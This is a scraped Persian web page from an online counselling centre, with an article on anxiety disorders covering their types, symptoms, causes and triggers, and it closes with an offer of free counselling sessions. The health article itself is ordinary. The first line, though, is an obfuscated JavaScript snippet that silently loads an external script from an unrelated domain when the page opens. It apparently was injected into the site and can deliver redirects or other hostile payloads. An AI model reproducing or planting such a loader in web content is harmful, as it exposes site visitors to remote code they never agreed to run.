;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); اختلال اضطراب چیست و چه علائمی دارد؟ | مرکز مشاوره آنلاین روان‌یاری
اختلال اضطراب چیست و چه علائمی دارد؟

اختلال اضطراب چیست و چه علائمی دارد؟

میزان پیشرفت خواندن شما

فهرست مطالب

مقدمه

هر فردی در زندگی روزمره، هنگام انجام کارهای شخصی و… اضطراب را تجربه کرده است. اضطراب در حالت کلی به عنوان دلهره یا دلشوره شناخته می شود. به طور کلی هر فردی استرس را در زندگی خود به شکل مداوم یا هر چند وقت یکبار یا در هنگام مقابله با موقعیت های خاص تجربه می کند. با این وجود، برای اینکه بدانید اختلال اضطراب چیست بهتر است این مقاله مفید را تا انتها مطالعه کنید.

اضطراب چیست؟

هر فردی در بعضی از مواقع و شرایط زندگی به عنوان مثال روز اول کاری،  شرکت در آزمون مهم، امتحان رانندگی، انجام مصاحبه مهم و… مقدار قابل توجهی از اضطراب را تجربه می کند. اضطراب در حالت نرمال و طبیعی به شکل یک دلشوره چند دقیقه ای یا یک دلهره پیش از قرارگیری در موقعیت بروز می کند که به تدریج برطرف می‌شود. در این حالت، هیچ  جای نگرانی وجود ندارد. این در حالی است که در برخی از مواقع اضطراب به عنوان یک اختلال بروز می کند.

اختلال اضطراب چیست؟

برای اینکه مفهوم اختلال اضطراب چیست آشکار شود، بهتر است بدانید زمانی که دلهره از حالت نرمال خارج می شود و شما کنترلی بر آن ندارید، احتمالاً با اختلال اضطراب مواجه هستید. به طور کلی حالت دلهره و اضطراب یک  پاسخ طبیعی بدن نسبت به شرایط استرسی موجود است. در چنین وضعیتی، فرد دلشوره یا دلهره را در مورد قضایای آینده احساس می کند.

دلهره نگران کننده چه نوع دلهره ای است؟

استرسی که بیش از شش ماه یا بیشتر طول بکشد، می‌تواند زندگی شما را مختل کند. به همین خاطر این نوع استرس را به عنوان اختلال اضطراب معرفی می کنند. اختلال اضطراب می تواند در بیشتر موارد شما را از انجام کارهای روزمره باز دارد. ضمن اینکه ناتوان کننده نیز هست. نکته قابل توجه در مورد اختلال اضطراب این است که این احساس ترس به شکل دائمی است و در بیشتر مواقع همراه شماست.  مضطرب بودن به شکل دائمی شما را از انجام کارهایی که دوست دارید، باز می دارد. این احساس در موارد خیلی شدید می تواند شما را از انجام کارهایی همچون استفاده از آسانسور، تجربه کردن چیزهای جدید، خروج از منزل و غیره باز دارد.

اختلال اضطراب یک نوع اختلال عاطفی به حساب می آید که به شدت فرد را تحت تاثیر قرار می دهد. متاسفانه زنان بیش از مردان به اختلال اضطراب دچار می شوند.

انواع اختلالات اضطرابی

  • اختلال هراس: اختلال اضطراب می تواند اختلال هراس باشد. این اختلال خود را با حملات پانیک تکرار شونده در مواقع غیر منتظره نشان می دهد.
  • فوبیا: این نوع اختلال، ترس و دلهره نسبت به یک شیء، فعالیت یا موقعیت خاص را بیان می کند. این نوع افراد در بیشتر موارد برای کنترل استرس، نیاز به گروه درمانی دارند. در این نوع روش، تعدادی از افرادی که دارای یک مشکل واحد هستند، با هم گفتگو می کنند.
  • اختلال وسواس فکری یا عملی: این نوع اختلال مربوط به مواقعی است که شما افکار آزاردهنده و غیرمنطقی دارید. طوری که این افکار شما را به انجام رفتارهای تکرار شونده هدایت می کند.
  • اختلال اضطراب اجتماعی نیز مربوط به احساس ترس نسبت به عکس العمل و قضاوت های دیگران در موقعیت های مختلف است.
  • اختلال اضطراب جدایی در مواقع اتفاق می افتد که فرد از عزیزان یا از محیط خانه خود دور است. در این حالت بدون رخ دادن یک اتفاق مشخص، فرد نسبت به خانواده یا محیط خانه احساس نگرانی دارد. این نوع اختلال اضطراب، نیاز به خانواده درمانی دارد. در این نوع درمان، اغلب مشاوران ترجیح می دهند ابتدا اطلاعاتی پیرامون مشکل فرد به خانواده ارائه کنند تا آن ها برخورد صحیح با او را بیاموزند.
  • اختلال اضطراب بیماری: افرادی که بدون هیچ گونه دلیل مشخصی احساس بیماری کرده یا بیش از حد نگران سلامتی خود هستند، این نوع اختلال را تجربه می‌ کنند. این اختلال را با نام هیپوکندری نیز می‌شناسند.
  • اختلال ptsd یا همان استرس بعد از سانحه: این نوع اضطراب معمولاً در پی یک اتفاق وحشتناک به وجود می آید.
  • اختلالات افسردگی: در بیشتر موارد اختلالات افسردگی می توانند منجر به اختلال اضطراب شوند.
  • بیماری های دیابت یا بیماریهای انسداد ریه در نوع مزمن نیز می‌توانند باعث اضطراب شوند.
  اختلال دو قطبی چیست؟

علائم اضطراب چیست؟

احساس آشفتگی در ذهن، حالات بدن، ضربان قلب تند، عدم تمرکز، رنگ پریدگی، تنگی نفس، سفت شدن بیش از اندازه عضلات، احساسات منفی، تحریک پذیری، خستگی، بی قراری، نگرانی شدید بدون دلیل مشخص، لرز، احساس خفگی، سرگیجه، عدم تعادل، از دست دادن قدرت ذهنی، درد معده، ناتوانی و غیره می ‌توانند بخشی از علائم اضطراب باشند.

علائم اضطراب و دلهره

چگونه می توانم از دلشوره جلوگیری کنم؟

دلشوره ممکن است ناشی از یک وضعیت روانی، یک وضعیت جسمی، اثرات داروها، رویدادهای استرس زای زندگی یا ترکیبی از این ها باشد. وظیفه اولیه پزشک این است که ببیند آیا اضطراب شما نشانه بیماری دیگری است یا خیر. در این صورت، مدیریت یا جلوگیری از استرس به آسانی انجام می شود.

علت اضطراب چیست؟

  • استرس می ‌تواند ناشی از مصرف قهوه (کافئین)، آمفتامین ‌ها، سایر محرک‌ ها مانند کوکائین، پرکاری تیروئید، ریتم غیر طبیعی قلب و غیره باشد.
  • ناهنجاری های قلبی (مانند افتادگی دریچه میترال)نیز می توانند فرد را دچار استرس کنند.
  • اختلال اضطراب فراگیر: این نوع اختلال ها نیز می تواند به دلایل داشتن مشکلات عاطفی با خانواده یا همسر باشد. در این حالت، زوج درمانی می تواند درمان موثری برای استرس زوج های جوان در روابط با یکدیگر باشد.
  • اختلالات فوبیک
  • اختلالات استرس

رویدادهایی که می توانند باعث دلشوره می شوند

  • استرس ناشی از مدرسه (مشاوره کودک و نوجوان گزینه مناسبی برای درمان این نوع استرس است)
  • استرس در محل کار
  • استرس در یک رابطه شخصی مانند ازدواج (برای این نوع استرس، مشاوره قبل از ازدواج اهمیت بسیاری دارد)
  • استرس مالی
  • استرس ناشی از رویدادهای جهانی یا مسائل سیاسی
  • استرس ناشی از رویدادهای غیرقابل پیش بینی یا نامطمئن جهانی، مانند یک بیماری همه گیر
  • استرس ناشی از یک آسیب عاطفی مانند مرگ یکی از عزیزان
  • استرس ناشی از یک بیماری جدی پزشکی

سایر عوامل خارجی که می توانند باعث اضطراب شوند

  • عوارض دارویی
  • استفاده از مواد مخدر غیرقانونی مانند کوکائین
  • علائم یک بیماری پزشکی (مانند حمله قلبی، گرمازدگی، هیپوگلیسمی)
  • کمبود اکسیژن در شرایطی مانند بیماری ارتفاع زیاد، آمفیزم یا آمبولی ریه (لخته شدن خون در عروق ریه)

پیش از درمان دلهره، بهتر است ابتدا در مورد نوع استرس و دلایل آن اطلاعات لازم را به دست آورید. انجام مشاوره فردی می تواند اقدام مناسبی برای شناسایی نوع استرس و دلیل آن باشد.

اختلال اضطراب

جمع بندی

اغلب استرس های خفیف نیاز به درمان ندارند و به مرور زمان برطرف می شوند. استرس های شدید که در پی محرک اتفاق می افتند، نیاز به درمان های دارویی و… پیدا می کنند. با این حال، اجتناب از محرک، واقعاً می‌تواند اضطراب را در دراز مدت بدتر کند.

درک این نکته مهم است که اختلالات اضطرابی حتی در موارد شدید قابل درمان هستند. برای درمان استرس می توانید به مرکز مشاوره آنلاین روان یاری مراجعه کنید. این مرکز خدمات مختلفی نظیر مشاوره قبل از ازدواج، مشاوره فردی، گروه درمانی، زوج درمانی و… را به مراجعه کنندگان ارائه می کند.

منبع: healthline

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.